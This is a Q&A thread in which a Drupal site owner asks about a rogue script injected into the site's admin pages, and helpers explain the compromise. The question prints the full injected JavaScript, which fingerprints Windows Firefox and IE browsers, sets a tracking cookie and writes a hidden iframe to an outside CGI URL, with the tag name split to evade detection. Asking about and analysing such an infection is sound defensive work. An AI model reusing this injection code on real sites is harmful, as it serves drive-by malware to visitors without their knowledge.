# Why is "103fm" script appearing on Drupal website?

Tags: javascript, html, drupal

> **Possible Duplicate:**
>   [Weird Script Appearing In My Website's DOM](https://stackoverflow.com/questions/10239577/weird-script-appearing-in-my-websites-dom)

I just noticed a weird script running in my websites DOM. I am running DRUPAL. The script is http://www.103fm.net/release.js. I don't know where to begin looking to find this rogue script. My website is miloads.com and it only happens in the admin menus. The weird thing is the file doesn't exist on 103fm.net, but it actually loads the following script:

```
var BrowserDetect = {
init: function() {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
searchString: function(data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
searchVersion: function(dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
dataBrowser: [{
string: navigator.userAgent,
subString: "Firefox",
identity: "Firefox"
}, {
string: navigator.userAgent,
subString: "MSIE",
identity: "Explorer",
versionSearch: "MSIE"
}],
dataOS: [{
string: navigator.platform,
subString: "Win",
identity: "Windows"
}]
};
function addCookie(szName, szValue, dtDaysExpires) {
var dtExpires = new Date();
var dtExpiryDate = "";
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
dtExpiryDate = dtExpires.toGMTString();
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
function findCookie(szName) {
var i = 0;
var nStartPosition = 0;
var nEndPosition = 0;
var szCookieString = document.cookie;
while (i <= szCookieString.length) {
nStartPosition = i;
nEndPosition = nStartPosition + szName.length;
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
nStartPosition = nEndPosition + 1;
nEndPosition = document.cookie.indexOf(";", nStartPosition);
if (nEndPosition < nStartPosition)
nEndPosition = document.cookie.length;
return document.cookie.substring(nStartPosition, nEndPosition);
break;
}
i++;
}
return "";
}
BrowserDetect.init();
var szCookieString = document.cookie;
var stopit = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) {
addCookie("geo_id2", "753445", 1);
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>");
} else {}
```

Comment: My other question was closed so I created a new one with more information.

Comment: the script is actually writing a ghost cookie on your client's browser(which is why I didn't yet open your website) and passing it to its own database with the `document.write` call.

Comment: Some of the advice in the closed question is worthwhile. Get a good text search program (or use `grep` perhaps) and search for the script. Meanwhile, make sure you have changed all your passwords: if you haven't added that script -- by installing a rogue plugin, for example -- then someone else has.

Answer (score 1, accepted):

Similarly, our client's server was compromised last night, by IP Addresses in Romania, Czech Republic and Poland. These seemingly automated processes appear to inject a script tag at the top of the body tag. This script appears to generate a cookie on Windows machines running Firefox and IE. It then opens an iframe and runs a CGI script running on a site hosted in Russia.

Fortunately, the latest version of Firefox won't even load the script; IE however does.

Chrome (despite not being affected) won't even allow you to visit the page on which this has happened.

As all reports I can find of this have happened recently, it could very well be a software vunerability, rather than compromised passwords - what FTP server are you running (connect to the server with your FTP client, and the console should tell you). The server in question is running ProFTPd 1.3.1.

If the software is common, then the creators should be informed.

Comment: I had hostgator look into it.....every single one of my domains was infected by it. I had every single domain then marked by Google as malware.Thankfully they were able to get rid of it but I'm still waiting for Google to un-block my websites =/